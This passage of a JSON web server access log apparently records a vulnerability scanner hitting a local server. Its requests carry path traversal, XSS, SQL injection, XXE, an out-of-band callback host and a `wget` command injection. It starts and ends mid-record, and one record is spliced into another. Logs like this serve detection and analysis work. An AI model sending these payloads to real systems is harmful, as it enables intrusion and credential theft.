Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=example.com&id=43569 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/submissions HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=ca281d8smpvb9r2g07h0dow13pbyo4d7e.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini 